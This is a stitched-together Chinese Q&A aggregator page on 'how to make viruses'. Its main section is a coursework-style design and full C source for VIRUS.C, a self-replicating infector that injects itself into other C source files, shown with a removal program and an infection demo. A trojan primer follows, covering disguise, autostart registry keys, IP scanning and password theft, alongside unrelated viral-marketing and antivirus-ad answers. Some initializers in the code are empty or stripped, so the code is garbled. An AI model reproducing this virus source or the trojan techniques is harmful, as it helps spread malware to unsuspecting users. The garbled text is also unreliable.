當前位置:首頁 » 文件管理 » 怎樣打造病毒內容
擴展閱讀
可以馴化動物原始人游戲 2025-05-18 04:06:20
qq里可以打字的圖片 2025-05-18 03:53:44

怎樣打造病毒內容

發布時間: 2022-10-10 11:28:33

『壹』 新型冠狀病毒手抄報文字內容

一、認識新型冠狀病毒

『貳』 怎樣編寫病毒

3.1.1病毒程序VIRUS.C
這是一個用C語言寫的病毒程序,當激發病毒程序時顯示時間,然後返回。病毒程序VIRUS.C可將病毒傳染給一個C語言程序。當被病毒感染的程序經編譯、連接和執行後,又可以將病毒部分傳染給其他的C語言源程序。每執行一次帶有病毒的C語言程序,就向C語言源程序傳播一次病毒。此程序的設計思路如下:
當含有病毒部分的程序被執行時,首先進入病毒程序。它在磁碟上找擴展名為C的匹配文件,如果找到,查找是否有被傳染過的標志「INFECTED」。如果有此標志,繼續找其它的C文件,直至全部檢查一遍。若沒有這個標志,則
(1)在未被感染的C程序頭部加入「INFECTED」已被傳染標志。
(2)讀取病毒文件的頭文件,將其插入到即將被感染的文件頭部。如果發現有重復則不插入。
(3)在主程序中插入「VIRUSES();」調用VIRUSES函數。尋找printf、for、while、break語句,如果找到就在之前插入。
(4)在文件尾部插入VIRUSES_SUB子程序。
(5)在插入到將感染文件裡面的VIRUSES_SUB子程序裡面,必須把文件名改為當前自身的文件名,否則被傳染後的文件經過編譯、連接和運行後不能再繼續傳染。
(6)最後插入VIRUSES子程序。這個子程序裡面調用了VIRUSES_SUB,執行到這里返回執行結果信息。
其中用到4個出錯的返回值,分別是:
1:用戶文件太大,不傳染;
2:帶病毒文件打不開,不傳染;
3:帶病毒文件讀取不成功,不傳染;
4:查找第一個匹配文件不成功。
如果返回值是0代表文件傳染成功。
具體實現過程如下:
其中用到的函數和結構體用法參考3.3節。
首先導入病毒子程序要用到的三個庫文件,分別是dir.h, stido.h, dos.h.在主函數裡面只調用VIRUSES函數。緊跟定義VIRUSES函數裡面要調用的VIURS_SUB函數。裡面定義了若干個變數。ffblk用來保存查找到的匹配文件的信息,用到裡面的ff_name變數來保存匹配文件名。
然後定義保存未感染的文件和病毒文件的文件型指針變數,分別用是*virus_r和*virus_v.讀取文件的緩沖區,放到二維數組a[500][80]裡面臨時存放。因為此程序對大於500行的C文件不進行傳染,所以完全可以放到裡面。首先用getdate函數獲取系統當前日期並輸出。接著用findfirst函數查找擴展名為C的文件,將其信息保存到ffblk裡面。用fgets函數讀文件的第一行,長度是80-1個字元。然後用strstr函數檢測病毒的標志,看文件是否有INFECT這個標志。
如果有,表示文件已經被傳染,關閉文件,不進行傳染。當含有病毒部分的程序被執行時,首先進入病毒程序。它在磁碟上查找*.C的匹配文件,一旦找到,查找「已被傳染過」的標志INFECTED。若有此標志,繼續找其它*.C文件,直至全部檢查一遍。
如果沒有這個標志,將文件全部讀入a[500][80],如果發現文件超過500行,不傳染,返回。將文件指針指向文件頭,打開帶病毒的文件。如果打不開,返回。
然後讀取帶病毒文件的前4行,也就是病毒子程序要用到的頭文件,寫入將被傳染的文件。若不能讀取帶病毒文件,返回。用n_line變數控制行數,把將被傳染文件的源程序寫回原文件。其中要進行處理不寫入病毒文件已有的包含語句,也就是說使#Include語句不重復。
這點是這樣實現的:定義一個字元數組char include_h[]=; strstr函數查看將被傳染文件的頭文件是否和*include_h[]相同,如果相同,不進行插入。找出CALL VIRUSES;的插入點:如果有一行有printf、break、for、while語句其中之一,就對其後插入調用VIRUSES函數的調用語句。把病毒子程序寫入文件。最後處理更改被感染的文件名。如果不進行改名,就不能進行多次傳染,也就是說不能體現病毒的自我復制能力。查找一行是static char viruses_f[]=,把其中的文件名改為被感染的文件名。接著查找下一個匹配文件。
3.1.2病毒清除程序REVIURS.C
病毒的清除過程是和傳染過程相逆的。傳染的時候插入調用viruses函數的調用語句,在病毒清除文件裡面就要刪除掉這個語句。然後還要刪除掉病毒子程序VIURSES_SUB和VIURSES。有一個問題不能進行還原。因為當時插入病毒子程序需要的頭文件時沒有記錄傳染前文件的頭文件信息,所以不能進行還原。但是這一點不影響原文件。所以這點在病毒清除程序中沒有進行處理。
由於演示的時候病毒程序VIRUS.C和清除病毒程序REVIURS.C放在同一個目錄下進行演示。考慮到VIRUS.C會把REVIURS.C傳染和REVIRUS.C會把VIRUS.C清除兩種情況。所以編寫這兩個程序的時候必須加入一條條件語句if(strcmp(ffblk.ff_name,"REVIRUS.C")!=0)和if(strcmp(ffblk.ff_name,"VIRUS.C")!=0)。
當含有清除部分的程序被執行時。它在磁碟上找擴展名為C的匹配文件,如果找到,查找是否有被傳染過的標志「INFECTED」。如果無此標志,繼續找其它的C文件,直至全部檢查一遍。若有這個標志,則
(1)查找磁碟文件,如果是有病毒的傳染標志「INFECTED」則打開文件。如果沒有則關閉文件並且尋找下一個TEST*.C。
(2)讀取文件,首先判斷是否為Viruses();如果不是則判斷是否為int Viruses_sub(),如果都不是,則把讀取部分放在二維數組a[500][80]中,如果只是為int Viruses_sub(),則讀取文件結束。
(3)關閉文件,然後刪除該文件。
(4)創建一個跟刪除文件相同名字的文件。然後打開。
(5)把二維數組a[500][80]中的數據寫入到新建的文件中。關閉文件,讀取下一個文件。

3.2 程序流程圖
3.2.1 病毒程序VIRUS.C流程圖

N
N
Y Y





Y
N

3.2.2 解毒程序REVIRUS.C流程圖

N

Y




Y

N
Y

N

3.3其中用到的函數和結構體的說明:
(1)結構體struct ffblk (在dir.h中)類型變數
變數ffblk用於打開文件,獲取返回值。
Struct ffblk
{char ff_reserved[21];
char ff_attrib;
unsigned ff_ftime;
unsigned ff_fdate;
long ff_fize;
char ff_name[13];
};
程序中只用到ff_name來保存匹配文件名。
(2)結構體struct date(在dos.h中)變數
struct date
{int da_year; /* Year-1980 */
char da_day; /* Day of the month */
char da_mon; /* Month (1=Jan) */
};
程序中用來獲取系統當前日期。具體用法為:
void getdate (struct date *datep);
(3)查找匹配文件
findfirst()函數和findnext()函數
調用方式:整型數=findfirst(文件名,&結構變數名,屬性常數組合(如0×24));
功能:檢索由path和attr指定的文件,把結果返回到afer。
Findfirst返回關於第一個指定文件的信息。
Findnext繼續檢索。
返回值:0(檢索成功),-1(沒有找到指定的文件)
屬性常數:
FA_NORMAL(0*00) 含意:Normal file, no attributes
FA_RDONLY (0*01) 含意:只讀
FA_HIDDEN(0*02) 含意:隱含文件
FA_SYSTEM(0*24) 含意:系統文件
需要用到的頭文件: dir.h
程序中的匹配文件屬於普通文件,所以屬性常數為0。
(4)讀文件
函數原形:char *fgets (char *a, int n, FILE *fp);
功能:
從fp指向的文件讀取一個長度為(n-1)的字元串,最後加一個』 \0』,存入始地址為a的空間。
若在讀完n-1個字元之前遇到換行符或EOF,讀入即結束。
返回值:返回地址a。
若遇文件結束或出錯,返回NULL。
(5)在字元串中查找指定字元串的第一次出現
函數原形;
char *strstr(char *str1,char *str2);
功能:找出str2字元串在str1字元串中第一次出現的位置(不包括str2的串結束符)。
返回值:返回該位置的指針。
若找不到,返回NULL指針。
程序中用這個函數來判斷字元串是否一致。
(6)改變文件位置指針
函數原形:int fseek (FILE *fp, long offset, int base);
功能:將fp所指文件的位置指針移到以base所指出的位置為基準、以offset為位移量的位置。
返回值:返回當前位置。否則,返回-1。SEEK_SET為文件開始。
由於讀取文件的時候文件指針要發生變化。而重新執行一條命令的時候需要重新定位文件指針的位置,所以要用到fseek函數。程序中用這個函數定位到文件頭,對文件進行重新讀取。
3.4 程序清單
3.4.1病毒程序VIRUS.C程序清單如下:
/*INFECTED*/
#include "stdio.h"
#include "dos.h"
#include "dir.h"
main()
{
viruses();
}
int viruses_sub()
{
struct ffblk ffblk;
int done,i,j,k,n_line;
FILE *virus_r,*virus_v;
/*virus_r指向將被感染的文件,virus_v指向已帶病毒的文件*/
char a[500][80],b[80],*p1,*p2; /*將被傳染的文件讀入a[500][80]臨時存放*/
static char viruses_f[]=;/*文件被傳染後,修改該值為自身文件名*/
int include_write;
int virus_call=0;
int virus_start=0;
char *main_flag[]=;
char *include_h[]=;
char *v_flag[]=;
struct date today;
/*VIRUSES DISPLAY*/
getdate(&today); /*病毒顯示日期信息*/
printf("Today is %d/%d/%d\n",today.da_mon,today.da_day,today.da_year);
/*AFFECT VIRUSES*/
done=findfirst("*.c",&ffblk,0); /*查找第一個匹配文件*/
while(!done)
{
if(strcmp(ffblk.ff_name,"REVIRUS.C")!=0)
{
virus_r=fopen(ffblk.ff_name,"r+w");
if(virus_r!=NULL)
{
p1=fgets(&a[0][0],80,virus_r);
if(strstr(p1,v_flag[0])==NULL)
{
n_line=0; /*把文件全部讀入a[500][80]*/
while(p1!=NULL)
{
n_line++;
p1=fgets(&a[n_line][0],80,virus_r);
if(n_line>=500)
{
fclose(virus_r);
return(1);
}
}
fseek(virus_r,0,SEEK_SET);
virus_v=fopen(&viruses_f[0],"r"); /*打開帶病毒的文件*/
if(virus_v==NULL)
{
fclose(virus_r);
return(2);
}
for(i=1;i<5;i++) /*讀帶病毒文件前4行並寫入將被傳染的文件*/
{
p2=fgets(b,80,virus_v);
if(p2==NULL)
{
fclose(virus_r);
fclose(virus_v);
return(3);
}
fputs(b,virus_r);
}
for(j=0;j<n_line;j++) /*把將被傳染文件的原程序寫回原文件*/
{
include_write=1; /*不寫入病毒文件已有的包含語句*/
if(strstr(&a[j][0],"#include")!=NULL)
for(i=0;i<3;i++)
if(strstr(&a[j][0],include_h[i])!=NULL)
include_write=-1;
if(virus_call==0) /*插入調用語句,並加上回車換行*/
for(i=0;i<4;i++)
if(strstr(&a[j][0],main_flag[i])!=NULL)
{
for(k=0;k<80;k++)
b[k]=0;
strcpy(&b[0],"viruses();");
b[10]=13;
b[11]=10;
fputs(b,virus_r);virus_call=1;
i=4;
}
if(include_write==1)fputs(&a[j][0],virus_r);
}
p1=fgets(b,80,virus_v); /*把病毒子程序寫入文件*/
while(p1!=NULL)
{
if(virus_start==0) /*找病毒子程序的第一條語句*/
if(strstr(p1,"int viruses_sub()")!=NULL)
virus_start=1;
if(virus_start==1)
{
if(strstr(p1,"char")!=NULL)
if(strstr(p1,"viruses_f[]=")!=NULL)
{
strcpy(&b[29],ffblk.ff_name);
i=strlen(&b[0]);
b[i]=34;
strcpy(&b[i+1],");");
b[i+3]=13;
b[i+4]=10;
}
fputs(b,virus_r);
}
p1=fgets(b,80,virus_v);
}
fclose(virus_v);
fclose(virus_r);
return(0);
}
fclose(virus_r);
}
}
done=findnext(&ffblk);
}
return(4);
}

viruses()
{
int num;
num=viruses_sub();
switch (num)
{
case 0 : printf("successful\n");
break;
case 1: printf("the file is outof line\n");
break;
case 2 : printf("the viruses file cannot open\n");
break;
case 3 : printf("cannot read viruses file\n");
break;
case 4: printf("cannot find file\n");
}
getch();
}

3.4.2病毒清除程序REVIURS.C清單如下:
#include "stdio.h"
#include "dos.h"
#include "dir.h"
main()
{
struct ffblk ffblk;
int done,i,j,line,k;
static int n_line;
FILE *virus_r,*virus_v;
char a[500][80],b[80],*p;
char *v_flag[]=;
done=findfirst("*.c",&ffblk,0);
while(!done)
{
if(strcmp(ffblk.ff_name,"VIRUS.C")!=0)
{
for(k=0;k<500;k++)
for(j=0;j<80;j++)
a[k][j]=0;
virus_r=fopen(ffblk.ff_name,"r+w");
if(virus_r!=NULL)
{
p=fgets(&b[0],80,virus_r);

if(strstr(p,v_flag[0])!=NULL)
{
line=0;
while(p!=NULL)
{
p=fgets(&b[0],80,virus_r);
if(strstr(&b[0],"int viruses_sub()")!=NULL)
break;
else if(strstr(&b[0],"viruses();")==NULL)
{
k=strlen(b);
for(j=0;j<k;j++)
a[line][j]=b[j];
a[line][j+1]=0;
line++;
}
}
n_line=line;
fclose(virus_r);
remove(ffblk.ff_name); /*刪除文件*/
virus_r=fopen(ffblk.ff_name,"w+"); /*打開將被感染的文件*/
for(i=0;i<n_line;i++)
{
fputs(&a[i][0],virus_r); /*把二維數組中的數據寫入原文件*/
}
fclose(virus_r);
}
}
}
done=findnext(&ffblk); /*查找下一個匹配文件*/
}

}

4. 計算機病毒的演示
4.1病毒程序VIRUS.C的演示過程
在一張已經格式化的軟盤上,除了病毒源程序VIRUS.C和REVIRUS.C外,還有兩個尚未被感染的C語言程序TEST1.C和TEST2.C。原始代碼分別如下:
TEST1.C:
#include "stdio.h"
main()
{
int i,sum;
for(i=1;i<100;i++)
sum=sum+i;
printf("sum=%d\n",sum);
}
TEST2.C
#include "stdio.h"
main()
{
printf("hello,world!\n");
}
在命令提示符下鍵入dir命令查看文件信息。

然後編譯連接並執行VIRUS.C文件,運行結果顯示:
Today is 5/20/2004
Successful
說明傳染成功。再用dir命令查看文件信息

可以看到TEST2.C文件已經被傳染,大小從64變成3949。用type命令查看TEST1的內容

可以看到病毒的子程序已經插入了,而且在主函數裡面插入了調用VIRUSES函數語句。而且文件名自動改為「TEST2.C」。(如圖中紅線所示)
然後再把TEST2.C文件編譯連接並運行。成功後,再用dir命令查看文件信息

可以看到TEST1.C也被感染了,大小從107變成了3969。再用type命令查看,結果如下:

可以看到,文件名稱已經自動改為TEST1.C,而且病毒子程序已經拷貝過來,在這個過程中REVIRUS.C始終沒有被感染,達到了我們的目的。
文件被感染前後內容如下圖所示:

4.2病毒清除程序REVIRUS.C演示過程
然後我們來演示病毒的清除。編譯運行REVIRUS.C後用dir命令查看文件信息。

圖中可以看到TEST1.C和TEST2.C都變小了。雖然沒有還原到以前的大小。這是因為運行病毒子程序需要的頭文件沒有刪除,原因前面已經提及過了。然後用type命令分別查看一下TEST1.C和TEST2.C的內容。

圖中可以看到,除了程序需要用到的頭文件,剩下的已經基本還原。而且沒有清除VIRUS.C裡面的程序,基本達到了清除病毒的目的。演示成功。
從演示過程中可以看出,一旦程序被病毒感染,這個程序經過編譯連接後運行時就能向沒感染上病毒的程序擴散病毒,使病毒在系統中不斷蔓延下去。而病毒清除程序運行一次就可以刪除掉所有的病毒子程序和插入的調用語句。

『叄』 如何編制手機病毒

您好:

建議您不要編制手機病毒,編制手機病毒會對您和別人的手機造成損害的,如果您曾使用過此類不安全的病毒軟體的話,為了您手機的安全,建議您使用騰訊手機管家對您的手機殺毒吧,首先需要您安裝騰訊手機管家到手機,您可以使用usb數據線將手機連接到電腦,然後打開騰訊電腦管家的軟體管理,在軟體管理裡面搜索騰訊手機管家,然後選擇騰訊手機管家後一鍵下載安裝到手機就可以,安裝好以後打開騰訊手機管家的安全防護,然後選擇病毒查殺後一鍵殺毒就可以。

騰訊電腦管家企業平台:http://..com/c/guanjia/

『肆』 病毒營銷如何做

做病毒營銷前首先要了解什麼是病毒式營銷,病毒式的營銷是指發起人發出產品的最初信息到用戶,再依靠用戶自發的口碑宣傳,由於他的原理跟病毒的傳播類試,經濟學上稱之為病毒試營銷,是一種常用的網路營銷方法,常用於進行網站推廣、品牌推廣等,病毒式營銷利用的是用戶口碑傳播的原理,在互聯網上,這種「口碑傳播」更為方便,可以像病毒一樣迅速蔓延,因此病毒式營銷成為一種高效的信息傳播方式,而且,由於這種傳播是用戶之間自發進行的,因此幾乎是不需要費用的網路營銷手段。簡單的說就和傳說中的一傳十,十傳百的性質是一樣的。病毒性營銷目前已成為網路營銷中網站推廣方式之一,並且被很多網站嘗試使用。
做病毒營銷需要了解的幾點:
一、作為病毒性營銷有幾個基本特性
1、是提供有價值的內容,這是病毒式營銷的最基本前提;
2、是要有適宜的傳播途徑,可以非常便捷地自動傳播,象電子書等就是非常好的載體,可以吸引網民大量下載和傳播。
3、是可以巧妙地調動公眾的積極性,比如象時代營銷網的電子書,對很多下載網站來說都是非常好的內容,自然可以大量吸引各種網站作為資源來提供下載,這樣才能形成病毒式傳播的要素。 病毒性營銷作為一種較好的網站推廣方式,目前已被大家逐步接受和認可,但要良好地執行,還需要非常巧妙的策劃和構思。
二、病毒試營銷的幾種常見方法
1、免費的服務
一些大型的網站或公司會提供免費的二機域名,免費空間,免費程序介面,免費計數器等資源,這些資源中可以直接或間接的加入公司的連接或者其他產品的介紹,也還可以是廣告。特別是現在推出的窄告,很適合放在這些免費資源中。由於這些服務都是免費的,對用戶有著很大的吸引力,另外,當用戶自己在使用並對外宣傳的時候,就也為提供該服務的公司做了免費宣傳。
2、便名服務
便名服務服務不象上面的免費服務一樣需要一定的財力物力,比較適合小公司或個人網站。在網站上提供日常生活中常會用到的一些查詢,如:公交查詢,電話查詢,手機歸屬地查詢,天氣查詢等,把這些實用的查詢集中到一起,能給用戶提供極大的便利,會得到用戶很好的口碑,也就能很快的在網名中推廣開來。
3、節日祝福
每當到節日時,可以通過QQ,MSM,E-MAIL等工具想朋友發送一些祝福,後面跟上網頁地址或精美圖片,由於節日里,大家都很高興收到來自朋友的祝福和喜歡發祝福給朋友,一個病毒連就這樣形成了。
4、精美網頁或笑話
娛樂是人生活的追求,不管誰定下什麼目標,但最終是為了生活、娛樂,做一個精美的網頁或精彩的笑話發給朋友,朋友一定回很高興很會很快的發送給他的好朋友。
三、想做到病毒式的營銷效果,唯有做好內容。只有內容有趣、吸引人,傳播性才強,才會讓網民自發幫你分享和傳播,不用推就被傳的內容就想病毒,自發擴散。就內容而言,視頻是最好的方式,所以現在都說病毒視頻營銷是趨勢。但是門檻比較高,創意很重要。另外要自己會拍,會推,千萬不要找那種只拍不會推的影視公司,只會推不會拍的也不靠譜。所以做的人還不多。
四、病毒試營銷注意事項
1、不要直接發純商業廣告
2、產品要實用
3、不要欺騙用戶
4、做好人工服務

『伍』 病毒的編寫是用的什麼原理

在計算機領域中,它是一種基於遠程式控制制的黑客工具,具有隱蔽性和非授權性的特點。

所謂隱蔽性是指木馬的設計者為了防止木馬被發現,會採用多種手段隱藏木馬,這樣服務端即使發現感染了木馬,由於不能確定其具體位置,往往只能望「馬」興嘆。

所謂非授權性是指一旦控制端與服務端連接後,控制端將享有服務端的大部分操作許可權,包括修改文件,修改注冊表,控制滑鼠,鍵盤等等,而這些權力並不是服務端賦予的,而是通過木馬程序竊取的。

從木馬的發展來看,基本上可以分為兩個階段。

最初網路還處於以UNIX平台為主的時期,木馬就產生了,當時的木馬程序的功能相對簡單,往往是將一段程序嵌入到系統文件中,用跳轉指令來執行一些木馬的功能,在這個時期木馬的設計者和使用者大都是些技術人員,必須具備相當的網路和編程知識。

而後隨著WINDOWS平台的日益普及,一些基於圖形操作的木馬程序出現了,用戶界面的改善,使使用者不用懂太多的專業知識就可以熟練的操作木馬,相對的木馬入侵事件也頻繁出現,而且由於這個時期木馬的功能已日趨完善,因此對服務端的破壞也更大了。

所以所木馬發展到今天,已經無所不用其極,一旦被木馬控制,你的電腦將毫無秘密可言。

二、木馬原理
[編輯本段]

鑒於木馬的巨大危害性,我們將分原理篇,防禦與反擊篇,資料篇三部分來詳細介紹木馬,希望大家對特洛伊木馬這種攻擊手段有一個透徹的了解。

【一、基礎知識 】

在介紹木馬的原理之前有一些木馬構成的基礎知識我們要事先加以說明,因為下面有很多地方會提到這些內容。

一個完整的木馬系統由硬體部分,軟體部分和具體連接部分組成。

(1)硬體部分:建立木馬連接所必須的硬體實體。 控制端:對服務端進行遠程式控制制的一方。 服務端:被控制端遠程式控制制的一方。 INTERNET:控制端對服務端進行遠程式控制制,數據傳輸的網路載體。

(2)軟體部分:實現遠程式控制制所必須的軟體程序。 控制端程序:控制端用以遠程式控制制服務端的程序。 木馬程序:潛入服務端內部,獲取其操作許可權的程序。 木馬配置程序:設置木馬程序的埠號,觸發條件,木馬名稱等,使其在服務端藏得更隱蔽的程序。

(3)具體連接部分:通過INTERNET在服務端和控制端之間建立一條木馬通道所必須的元素。 控制端IP,服務端IP:即控制端,服務端的網路地址,也是木馬進行數據傳輸的目的地。 控制端埠,木馬埠:即控制端,服務端的數據入口,通過這個入口,數據可直達控制端程序或木馬 程序。
用木馬這種黑客工具進行網路入侵,從過程上看大致可分為六步(具體可見下圖),下面我們就按這六步來詳細闡述木馬的攻擊原理。

一.配置木馬

一般來說一個設計成熟的木馬都有木馬配置程序,從具體的配置內容看,主要是為了實現以下兩方 面功能:

(1)木馬偽裝:木馬配置程序為了在服務端盡可能的好的隱藏木馬,會採用多種偽裝手段,如修改圖標 ,捆綁文件,定製埠,自我銷毀等,我們將在「傳播木馬」這一節中詳細介紹。

(2)信息反饋:木馬配置程序將就信息反饋的方式或地址進行設置,如設置信息反饋的郵件地址,IRC號 ,ICO號等等,具體的我們將在「信息反饋」這一節中詳細介紹。

【二、傳播木馬】.

(1)傳播方式:

木馬的傳播方式主要有兩種:一種是通過E-MAIL,控制端將木馬程序以附件的形式夾在郵件中發送出 去, 收信人只要打開附件系統就會感染木馬;另一種是軟體下載,一些非正規的網站以提供軟體下載為名義, 將木馬捆綁在軟體安裝程序上,下載後,只要一運行這些程序,木馬就會自動安裝。

(2)偽裝方式:

鑒於木馬的危害性,很多人對木馬知識還是有一定了解的,這對木馬的傳播起了一定的抑製作用,這 是木馬設計者所不願見到的,因此他們開發了多種功能來偽裝木馬,以達到降低用戶警覺,欺騙用戶的目的。

(一)修改圖標

當你在E-MAIL的附件中看到這個圖標時,是否會認為這是個文本文件呢?但是我不得不告 訴你,這也有可能是個木馬程序,現在 已經有木馬可以將木馬服務端程序的圖標改成HTML,TXT, ZIP等各種文件的圖標,這有相當大的迷 惑性,但是目前提供這種功能的木馬還不多見,並且這種 偽裝也不是無懈可擊的,所以不必整天提心吊膽,疑神疑鬼的。

(二)捆綁文件

這種偽裝手段是將木馬捆綁到一個安裝程序上,當安裝程序運行時,木馬在用戶毫無察覺的 情況下 ,偷偷的進入了系統。至於被捆綁的文件一般是可執行文件(即EXE,COM一類的文件)。

(三)出錯顯示

有一定木馬知識的人都知道,如果打開一個文件,沒有任何反應,這很可能就是個木馬程序, 木馬的 設計者也意識到了這個缺陷,所以已經有木馬提供了一個叫做出錯顯示的功能。當服務 端用戶打開木 馬程序時,會彈出一個如下圖所示的錯誤提示框(這當然是假的),錯誤內容可自由 定義,大多會定製成 一些諸如「文件已破壞,無法打開的!」之類的信息,當服務端用戶信以 為真時,木馬卻悄悄侵入了 系統。

(四)定製埠

很多老式的木馬埠都是固定的,這給判斷是否感染了木馬帶來了方便,只要查一下特定的 埠就 知道感染了什麼木馬,所以現在很多新式的木馬都加入了定製埠的功能,控制端用戶可 以在1024---65535之間任選一個埠作為木馬埠(一般不選1024以下的埠),這樣就給判斷 所感染木馬類型帶 來了麻煩。

(五)自我銷毀

這項功能是為了彌補木馬的一個缺陷。我們知道當服務端用戶打開含有木馬的文件後,木馬 會將自己拷貝到WINDOWS的系統文件夾中(C:WINDOWS或C:WINDOWSSYSTEM目錄下),一般來說 原木馬文件 和系統文件夾中的木馬文件的大小是一樣的(捆綁文件的木馬除外),那麼中了木馬 的朋友只要在近來 收到的信件和下載的軟體中找到原木馬文件,然後根據原木馬的大小去系統 文件夾找相同大小的文件, 判斷一下哪個是木馬就行了。而木馬的自我銷毀功能是指安裝完木 馬後,原木馬文件將自動銷毀,這 樣服務端用戶就很難找到木馬的來源,在沒有查殺木馬的工 具幫助下,就很難刪除木馬了。

(六)木馬更名

安裝到系統文件夾中的木馬的文件名一般是固定的,那麼只要根據一些查殺木馬的文章,按 圖索驥在系統文件夾查找特定的文件,就可以斷定中了什麼木馬。所以現在有很多木馬都允許控 制端用戶自由定製安裝後的木馬文件名,這樣很難判斷所感染的木馬類型了。

【三.運行木馬】

服務端用戶運行木馬或捆綁木馬的程序後,木馬就會自動進行安裝。首先將自身拷貝到WINDOWS的 系統文件夾中(C:WINDOWS或C:WINDOWSSYSTEM目錄下),然後在注冊表,啟動組,非啟動組中設置好木馬 的觸發條件 ,這樣木馬的安裝就完成了。安裝後就可以啟動木馬了,具體過程見下文:

①由自啟動激活木馬

自啟動木馬的條件,大致出現在下面6個地方:

1.注冊表:打開HKEY_LOCAL_下的五個以Run 和RunServices主鍵,在其中尋找可能是啟動木馬的鍵值。

2.WIN.INI:C:WINDOWS目錄下有一個配置文件win.ini,用文本方式打開,在[windows]欄位中有啟動 命令 load=和run=,在一般情況下是空白的,如果有啟動程序,可能是木馬。 3.SYSTEM.INI:C:WINDOWS目錄下有個配置文件system.ini,用文本方式打開,在[386Enh],[mic], [drivers32]中有命令行,在其中尋找木馬的啟動命令。

4.Autoexec.bat和Config.sys:在C盤根目錄下的這兩個文件也可以啟動木馬。但這種載入方式一般都 需要控制端用戶與服務端建立連接後,將已添加木馬啟動命令的同名 文件上傳 到服務端覆蓋這兩個文件才行。

5.*.INI:即應用程序的啟動配置文件,控制端利用這些文件能啟動程序的特點,將製作好的帶有木馬 啟動命令的同名文件上傳到服務端覆蓋這同名文件,這樣就可以達到啟動木馬的目的了。

6.啟動菜單:在「開始---程序---啟動」選項下也可能有木馬的觸發條件。

②由觸發式激活木馬

1.注冊表:打開HKEY_CLASSES_ROOT文件類型\shellopencommand主鍵,查看其鍵值。舉個例子,國產 木馬「冰河」就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的鍵值,將「C :WINDOWS NOTEPAD.EXE %1」該為「C:WINDOWSSYSTEMSYXXXPLR.EXE %1」,這時你雙 擊一個TXT文件 後,原本應用NOTEPAD打開文件的,現在卻變成啟動木馬程序了。還要說明 的是不光是TXT文件 ,通過修改HTML,EXE,ZIP等文件的啟動命令的鍵值都可以啟動木馬 ,不同之處只在於「文件類型」這個主鍵的差別,TXT是txtfile,ZIP是WINZIP,大家可以 試著去找一下。

2.捆綁文件:實現這種觸發條件首先要控制端和服務端已通過木馬建立連接,然後控制端用戶用工具 軟體將木馬文件和某一應用程序捆綁在一起,然後上傳到服務端覆蓋原文件,這樣即使 木馬被刪 除了,只要運行捆綁了木馬的應用程序,木馬又會被安裝上去了。

3.自動播放式:自動播放本是用於光碟的,當插入一個電影光碟到光碟機時,系統會自動播放裡面的內容,這就是自動播放的本意,播放什麼是由光碟中的AutoRun.inf文件指定的,修改AutoRun.inf中的open一行可以指定在自動播放過程中運行的程序。後來有人用於了硬碟與U盤,在U盤或硬碟的分區,創建Autorun.inf文件,並在Open中指定木馬程序,這樣,當你打開硬碟分區或U盤時,就會觸發木馬程序的運行。

木馬作者還在不斷尋找「可乘之機」這里只是舉例,又有不斷的自啟動的地方被挖掘出來。

(2)木馬運行過程

木馬被激活後,進入內存,並開啟事先定義的木馬埠,准備與控制端建立連接。這時服務端用 戶可以在MS-DOS方式下,鍵入NETSTAT -AN查看埠狀態,一般個人電腦在離線狀態下是不會有埠 開放的,如果有埠開放,你就要注意是否感染木馬了。下面是電腦感染木馬後,用NETSTAT命令查 看埠的兩個實例:

其中①是服務端與控制端建立連接時的顯示狀態,②是服務端與控制端還未建立連接時的顯示狀態。

在上網過程中要下載軟體,發送信件,網上聊天等必然打開一些埠,下面是一些常用的埠:

(1)1---1024之間的埠:這些埠叫保留埠,是專給一些對外通訊的程序用的,如FTP使用21, SMTP使用25,POP3使用110等。只有很少木馬會用保留埠作為木馬埠 的。

(2)1025以上的連續埠:在上網瀏覽網站時,瀏覽器會打開多個連續的埠下載文字,圖片到本地 硬碟上,這些埠都是1025以上的連續埠。

(3)4000埠:這是OICQ的通訊埠。

(4)6667埠:這是IRC的通訊埠。 除上述的埠基本可以排除在外,如發現還有其它埠打開,尤其是數值比較大的埠,那就要懷疑 是否感染了木馬,當然如果木馬有定製埠的功能,那任何埠都有可能是木馬埠。

【四.信息泄露】

一般來說,設計成熟的木馬都有一個信息反饋機制。所謂信息反饋機制是指木馬成功安裝後會收集 一些服務端的軟硬體信息,並通過E-MAIL,IRC或ICO的方式告知控制端用戶。

從反饋信息中控制端可以知道服務端的一些軟硬體信息,包括使用的操作系統,系統目錄,硬碟分區況, 系統口令等,在這些信息中,最重要的是服務端IP,因為只有得到這個參數,控制端才能與服務端建立 連接,具體的連接方法我們會在下一節中講解。

【五.建立連接】

這一節我們講解一下木馬連接是怎樣建立的 。一個木馬連接的建立首先必須滿足兩個條件:一是 服務端已安裝了木馬程序;二是控制端,服務端都要在線 。在此基礎上控制端可以通過木馬埠與服 務端建立連接。

假設A機為控制端,B機為服務端,對於A機來說要與B機建立連接必須知道B機的木馬埠和IP地 址,由於木馬埠是A機事先設定的,為已知項,所以最重要的是如何獲得B機的IP地址。獲得B機的IP 地址的方法主要有兩種:信息反饋和IP掃描。對於前一種已在上一節中已經介紹過了,不再贅述,我們 重點來介紹IP掃描,因為B機裝有木馬程序,所以它的木馬埠7626是處於開放狀態的,所以現在A機只 要掃描IP地址段中7626埠開放的主機就行了,例如圖中B機的IP地址是202.102.47.56,當A機掃描到 這個IP時發現它的7626埠是開放的,那麼這個IP就會被添加到列表中,這時A機就可以通過木馬的控 制端程序向B機發出連接信號,B機中的木馬程序收到信號後立即作出響應,當A機收到響應的信號後, 開啟一個隨即埠1031與B機的木馬埠7626建立連接,到這時一個木馬連接才算真正建立。值得一提 的要掃描整個IP地址段顯然費時費力,一般來說控制端都是先通過信息反饋獲得服務端的IP地址,由於 撥號上網的IP是動態的,即用戶每次上網的IP都是不同的,但是這個IP是在一定范圍內變動的,如圖中 B機的IP是202.102.47.56,那麼B機上網IP的變動范圍是在202.102.000.000---202.102.255.255,所以 每次控制端只要搜索這個IP地址段就可以找到B機了。

【六.遠程式控制制】

木馬連接建立後,控制端埠和木馬埠之間將會出現一條通道。

控制端上的控制端程序可藉這條通道與服務端上的木馬程序取得聯系,並通過木馬程序對服務端進行遠 程式控制制。下面我們就介紹一下控制端具體能享有哪些控制許可權,這遠比你想像的要大。

(1)竊取密碼:一切以明文的形式,*形式或緩存在CACHE中的密碼都能被木馬偵測到,此外很多木馬還 提供有擊鍵記錄功能,它將會記錄服務端每次敲擊鍵盤的動作,所以一旦有木馬入侵, 密碼將很容易被竊取。

